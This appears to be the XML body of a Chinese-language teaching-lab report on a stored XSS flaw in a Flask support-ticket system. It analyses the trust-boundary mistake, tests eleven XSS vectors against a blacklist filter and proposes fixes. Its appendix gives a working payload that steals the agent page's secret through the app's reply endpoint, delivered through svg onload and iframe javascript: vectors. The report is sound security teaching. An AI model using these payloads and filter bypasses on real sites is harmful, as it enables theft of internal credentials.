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8"/>
        </w:rPr>
        <w:t>社交平台「客服中心」工单系统</w:t>
        <w:br/>
        <w:t>存储型 XSS 漏洞分析与利用实验报告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实验对象：http://172.17.0.13:14039（内网教学靶场）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一、实验结论</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>成功获取客服工作台的内部工单密钥：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="C01A1A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>vmc{HSdcURMmFu16SbjbXncfYHe1xNKTCJHy}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>漏洞类型：存储型跨站脚本（Stored XSS），叠加不完整的黑名单过滤与「内部视图」访问控制缺失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>危害等级：高危。攻击者无需任何凭据，仅通过提交一条工单，即可在客服浏览器上下文中执行任意 JavaScript，完整读取客服工作台上的全部内部信息，并可进一步冒充客服身份执行管理操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>二、漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>2.1 系统架构与两个视图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>同一套 Flask 应用存在两条渲染路径，且二者的安全处理强度不一致：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视图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URL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可达性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工单内容渲染方式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用户视图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/ticket/&lt;id&gt;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sz w:val="18"/>
              </w:rPr>
              <w:t>外部可达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完整 HTML 转义（安全）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客服工作台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/agent/ticket/&lt;id&gt;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sz w:val="18"/>
              </w:rPr>
              <w:t>仅容器内 127.0.0.1，外部 403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原始输出，不转义（存在漏洞）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0"/>
        </w:rPr>
        <w:t>实测确认：从外部请求 /agent/ticket/1 返回 403，且 X-Forwarded-For、X-Real-IP、X-Client-IP 等 13 种代理头均无法绕过该限制，说明其基于真实的 remote_addr 判定，访问控制本身是有效的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>2.2 核心缺陷：同一份数据，两种信任级别</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>开发人员对「用户看得见的页面」做了转义，却假设「只有客服能看的页面」不需要转义。这是典型的信任边界误判——转义的必要性取决于数据来源是否可信，而不是观看者是谁。工单内容 100% 来自匿名用户，在任何上下文中都属于不可信输入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>2.3 攻击链</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>完整链条如下，每一步均已实测验证：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攻击者提交工单 A（收集用）与工单 B（含 XSS 载荷）；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客服机器人在工单创建后立即访问 http://127.0.0.1/agent/ticket/B；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工作台将工单 B 的正文未经转义地插入页面 DOM，载荷随之被解析执行；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载荷在同源上下文中定位密钥节点 .mono，读取其文本内容；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载荷调用 fetch 向 /ticket/A/reply 提交回复，把密钥写入工单 A；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攻击者访问用户视图 /ticket/A，密钥即以普通文本呈现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>关键点：第 5 步的数据外带使用了应用自身的回复接口，不依赖攻击者在外网架设监听服务。这正是内网靶场环境下最可靠的外带通道——受害者浏览器的出网能力往往受限，但其访问同源自建服务的路径始终畅通。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>2.4 密钥在页面中的位置（实测截取）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>&lt;h1&gt;客服工作台&lt;/h1&gt;&lt;p&gt;工单 #49 · 待处理&lt;/p&gt;</w:t>
        <w:br/>
        <w:t>&lt;div class="card"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="row"&gt;&lt;span class="pill"&gt;内部视图&lt;/span&gt;&lt;/div&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="name"&gt;本次会话内部工单密钥&lt;/div&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p class="sub"&gt;客服系统内部凭据，仅客服可见，请勿外泄。&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="mono"&gt;vmc{HSdcURMmFu16SbjbXncfYHe1xNKTCJHy}&lt;/div&gt;</w:t>
        <w:br/>
        <w:t>&lt;/div&gt;</w:t>
        <w:br/>
        <w:t>&lt;div class="card"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="row"&gt;&lt;span class="name"&gt;attacker&lt;/span&gt;&lt;span class="sub"&gt;· 用户来信&lt;/span&gt;&lt;/div&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div style="margin-top:8px"&gt;&lt;svg onload="...注入的载荷..."&gt;&lt;/div&gt;</w:t>
        <w:br/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>可见密钥节点与注入点位于同一文档的相邻卡片中，因此注入代码可以直接用 document.querySelector('.mono') 命中，无需跨域。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>三、工作台的过滤规则与绕过（实测）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>对 11 种常见 XSS 向量逐一投递，得到如下结果：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向量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&lt;svg onload="..."&gt;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onload 未被过滤；运行在顶层文档上下文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&lt;body onload="..."&gt;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同上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&lt;iframe src="javascript:..."&gt;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伪协议未被过滤；运行在 iframe 上下文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&lt;object data="javascript:..."&gt;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未执行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加载时序慢于页面关闭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&lt;img src=x onerror="..."&gt;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未执行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onerror 属性名被剥离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&lt;img src=x ONERROR="..."&gt;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未执行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过滤大小写不敏感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&lt;video src=x onerror="..."&gt;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未执行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onerror 属性名被剥离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&lt;script&gt;...&lt;/script&gt;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未执行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innerHTML 插入不执行脚本（浏览器规范）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&lt;input autofocus onfocus="..."&gt;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未执行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需交互，自动聚焦未触发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&lt;div onmouseover="..."&gt;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未执行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需用户交互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/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&lt;svg onload=...&gt;（无引号）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/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>未执行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/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>载荷含空格与括号，属性解析失败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由此可判定工作台采用「黑名单过滤」而非「白名单净化」：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过滤命中 onerror（且大小写不敏感），但完全未覆盖 onload —— 黑名单不完整；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未过滤 javascript: 伪协议，仍可通过 iframe/object 的 src/data 属性执行；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&lt;script&gt; 未被执行是 innerHTML 规范的副作用，并非过滤生效，不能视为防护。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>从回流的页面源码中可以直观看到过滤的痕迹——onerror 的属性名被移除，仅残留 ="..."，导致后续内容被重新切分为一串畸形属性：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>&lt;img src="x" ="(function(){var="" c="16" ,b="..." ;function=""</w:t>
        <w:br/>
        <w:t xml:space="preserve">     snd(t,d){try{fetch('="" ticket="" '+c+'="" reply',...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>这正是基于黑名单过滤的典型失败模式：封堵了已知向量，却无法穷举 HTML 的表达能力。任何以「移除危险关键字」为思路的过滤器，最终都会被绕过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>四、两种注入执行上下文（实测）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>诊断脚本回传的探针结果表明，不同向量会落入不同上下文：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探针项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顶层文档注入（svg/body onload）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iframe 注入（javascript: URL）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window === parent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sz w:val="18"/>
              </w:rPr>
              <w:t>true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document.querySelector('.mono')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sz w:val="18"/>
              </w:rPr>
              <w:t>命中密钥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sz w:val="18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parent.document.querySelector('.mono')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sz w:val="18"/>
              </w:rPr>
              <w:t>命中密钥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/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>命中密钥</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>因此健壮的载荷应当优先尝试 parent，失败后回退到自身文档，以同时兼容两种上下文。报告中给出的 PoC 即采用了这种写法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>五、修复方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>5.1 根治：上下文相关的输出编码（必须）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>客服工作台必须与用户视图保持一致的转义强度。所有不可信数据在插入 HTML 时统一走模板引擎的自动转义：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># 错误：信任了「只有内部人员能看」这个前提</w:t>
        <w:br/>
        <w:t>return render_template_string(TPL, body=ticket.body | safe)</w:t>
        <w:br/>
        <w:br/>
        <w:t># 正确：无论谁看，来源不可信就必须转义</w:t>
        <w:br/>
        <w:t>return render_template_string(TPL, body=ticket.body)   # Jinja2 自动转义</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>原则：转义的依据是「数据来源是否可信」，而不是「观看者是谁」。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>5.2 用白名单净化替代黑名单过滤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引入 bleach / DOMPurify 等成熟库，按白名单保留有限标签与属性；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移除黑名单写法，黑名单无法穷举 HTML 与浏览器的解析边界；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禁止 javascript:、data: 等伪协议出现在 src/href/data 属性中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>5.3 纵深防御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部署内容安全策略（CSP）：default-src 'self'，禁止 inline 脚本与 eval，使即便发生注入也无法执行或外带数据；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将内部视图与用户视图彻底分离到不同源（不同域名/端口），避免注入代码与内部密钥处于同源；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密钥类敏感信息不应在前端 DOM 中长期驻留，应在用完后即焚或改为按需拉取；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为会话 Cookie 设置 HttpOnly + Secure + SameSite，降低凭据被窃取的风险。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>六、教学要点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信任边界：本实验最核心的认知点。「内部页面」不等于「可信数据」，转义只与数据来源有关。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黑名单的必然失败：实测中 onerror 被拦截而 onload 畅通，直观展示了黑名单无法穷举的困境。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浏览器解析语义：&lt;script&gt; 经 innerHTML 插入不执行，但事件处理器与 javascript: URL 会执行——需要理解 HTML 解析与脚本执行的时序。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同源策略的双面性：它既阻止了跨源读取，也为同一站点内的横向读取与数据外带提供了便利。本实验的外带通道正是利用了同源。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攻防对称性：403 的访问控制是有效的、正确的，但它防不住「借受害者的眼睛去看」这一类攻击——访问控制无法替代输入验证与输出编码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>附录：可复现 PoC（核心载荷）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>完整脚本见同目录 PoC_客服中心存储型XSS.py，核心载荷如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>setTimeout(function(){</w:t>
        <w:br/>
        <w:t xml:space="preserve">  var C='&lt;收集工单号&gt;';</w:t>
        <w:br/>
        <w:t xml:space="preserve">  var m=null;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  try{m=parent.document.querySelector('.mono');}catch(e){}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if(!m){try{m=document.querySelector('.mono');}catch(e){}}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  var v=m?m.textContent:'NOT_FOUND';</w:t>
        <w:br/>
        <w:t xml:space="preserve">  fetch('/ticket/'+C+'/reply',{method:'POST',</w:t>
        <w:br/>
        <w:t xml:space="preserve">    headers:{'Content-Type':'application/x-www-form-urlencoded'},</w:t>
        <w:br/>
        <w:t xml:space="preserve">    body:'body='+encodeURIComponent('STOLEN_KEY: '+v)});</w:t>
        <w:br/>
        <w:t>},1200);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>投递方式（放入工单正文，两个向量冗余投递以提高命中率）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>&lt;svg onload="&lt;上述 JS&gt;"&gt;&lt;/svg&gt;</w:t>
        <w:br/>
        <w:t>&lt;iframe src="javascript:&lt;上述 JS 经 URL 编码&gt;"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>— 本报告基于内网教学靶场实测，所有数据均为真实回传结果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